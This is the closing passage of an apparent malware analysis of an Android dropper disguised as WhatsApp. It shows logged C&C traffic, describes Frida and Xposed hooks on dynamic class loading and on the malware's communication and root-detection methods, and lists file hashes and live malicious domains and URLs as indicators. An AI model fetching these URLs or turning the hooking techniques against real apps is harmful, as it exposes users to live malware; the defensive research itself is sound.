11-20 17:05:42.971 I/Xposed (18750): [+] SERVER: [{"id":804050,"name":"OK"}]
11-20 17:05:42.989 I/Xposed (18750): [+] SERVER: []
11-20 17:06:42.186 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 17:06:49.057 I/Xposed (18750): [+] SERVER: []
11-20 17:07:42.203 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 17:07:44.087 I/Xposed (18750): [+] SERVER: []
11-20 17:08:42.252 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
view raw C2Log.log hosted with ❤ by GitHub

Frida and Xposed

During the investigation, both Frida and the Xposed framework were used to quickly gather information about the messages exchanged with the C&C server. Initially Frida has been selected to carry on the task of logging all the communication, but has been lately dropped because it caused some problems while instrumenting two methods with the same name (but different Java signature), even if the overload procedure was implemented. The code has been ported to an Xposed module that can be safely used to achieve early instrumentation and in particular hooking the dynamically loaded code as soon as it’s dropped and loaded by the libsecondhand.so library.

The module has been based on the DexHook code from the RedNaga team and in particular the infinite recursion problem that popped out while hooking the ClassLoader.loadClass method has been solved thanks to the Issue#188 on the Xposed repository.

Although the code is small and just a PoC, the idea is powerful enough to guarantee early instrumentation on an Android process employing dynamic class loading based on:

  • java.lang.ClassLoader.loadClass(name);
  • dalvik.system.BaseDexClassLoader(dexPath, optimizedDirectory, librarySearchPath, parent);
  • dalvik.system.DexFile.openDexFile(sourceName, outputName, flags);
  • android.support.multidex.MultiDex.install();

Aside from the support for the dynamic class loading, the code installs some hooks in the methods used to communicate with the C&C server, in particular:

  • infiltration.AdfdI9FaQBbbW3Hgur24m6n0.vvgQM33AjqPJZjX(String s, PrivateKey k): hooking the result of this method will let us log all the data received from the server;
  • infiltration.AdfdI9FaQBbbW3Hgur24m6n0.vvgQM33AjqPJZjX(String s, PublicKey k): hooking the first parameter of this method will let us log all the data sent to the server;
  • infiltration.AdfdI9FaQBbbW3Hgur24m6n0.jNWow5lMF5gpMRlovjqsFg(): hooking the result of this method will let us force the root detection flag; the idea was to force the result to false each time the code asked for the root status, and see if the server would have sent a command to download and execute an exploit on the device.

In the Attachments section you can find a link to both the Frida and Xposed solutions.

Additional information

Some additional information has been collected about the C&C server. For example, the domains alfa-aaa.site and ex2cloud.xyz seem to be part of the same network, because the systemofram.com/b/test/ URL is pointing to an HTML with embedded JS code referencing the other domains.

Further investigation will be needed to collect additional information about the C&C structure and detect more samples possibly available on the Play Store.

Attachments

This is a list of useful resources that have been developed during the analysis of the sample, they can be found on the repository:

  • Decoded.apk: This is the APK dropped by libsecondhand, the SHA256 of the dropped APK is 7300a2f8f93dd5a612c3d62ca49a742c1b761dbd454141407018173aca7ac1e1.
  • DecodeDropped.c: This is the C code to decode the dropped APK. The code to decode the encrypted strings in the libsecondhand.so library is basically the same, but each encoded strings starts with 1 byte indicating its length.
  • StringDecoder.py: This is a simple script that uses the decompiled code from the dropped APK as input and extracts (or tries to) all the encoded strings.
  • HookC2.py: This is the Frida script used to log the communication between the client and server; it’s not working on my device, feel free to reach me if you have a solution (address on the script comment).
  • Hooker: This is the Xposed module used to log the communication between the client and server; it’s fully functional and guarantees early instrumentation of the sample.

IOC:

  • Fake WhatsApp: 80fe0de24e58eb1c485d55c94d20ffd710fc4b8a05f2c20d9d0d42cabb683fad
  • Jewel Miner: 1daa6ff47d451107b843be4b31da6e5546c00a164dc5cfbf995bac24fef3bc6d
  • Fake WhatsApp Bitly URL: http://bit.ly/2xDkNhy
  • Jewel Miner C&C URL: https://systemofram.com

Conclusions

I would like to thank all the zLabs researchers, especially Rani Idan (@raniXCH) and the rest of the Malware Team (@evilsocket and @Matrix86_) for the suggestions they gave me about information gathering on the C&C server network.